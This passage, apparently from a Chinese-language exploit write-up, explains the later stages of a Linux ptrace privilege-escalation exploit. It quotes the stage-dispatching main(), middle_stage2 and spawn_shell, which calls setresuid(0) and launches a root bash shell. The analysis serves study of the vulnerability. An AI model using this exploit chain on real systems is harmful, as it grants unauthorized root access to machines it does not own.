函數 force_exec_and_wait 的作用是使用 ptrace 控制 tracee 執行 execveat 函數替換進程的鏡像, 這裏它控制 task B 執行了 task A 的進程（即 exploit 的可執行程序）然後參數爲 stage2, 這實際上就是讓 task B 執行了 middle_stage2 函數

167 int main(int argc, char **argv) {
168   if (strcmp(argv[0], "stage2") == 0)
169     return middle_stage2();
170   if (strcmp(argv[0], "stage3") == 0)
171     return spawn_shell();

而 middle_stage2 函數同樣調用了 force_exec_and_wait , 這將使 task B 利用 ptrace 控制 task C 執行 execveat 函數，將 task C 的鏡像也替換爲 exploit 的 binary, 且參數是 stage3

153 static int middle_stage2(void) {
154   /* our child is hanging in signal delivery from execve()'s SIGTRAP */
155   pid_t child = SAFE(waitpid(-1, &dummy_status, 0));
156   force_exec_and_wait(child, 42, "stage3");
157   return 0;
158 }

當 exploit binary 以參數 stage3 運行時，實際運行的是 spawn_shell 函數, 所以 task C 最後階段運行的是 spawn_shell

160 static int spawn_shell(void) {
161   SAFE(setresgid(0, 0, 0));
162   SAFE(setresuid(0, 0, 0));
163   execlp("bash", "bash", NULL);
164   err(1, "execlp");
165 }

在 spawn_shell 函數里，它首先使用 setresgid/setresuid 將本進程的 real uid/effective uid/save uid 都變成 root, 由於 task C 剛剛已經執行了 suid binary 將自身的 euid 變成了 root, 所以這裏的 setresuid/setresgid 可以成功執行，到此爲止， task C 就變成了一個完全的 root 進程，最後再執行 execlp 啓動一個 shell, 即得到了一個完整 root 權限的 shell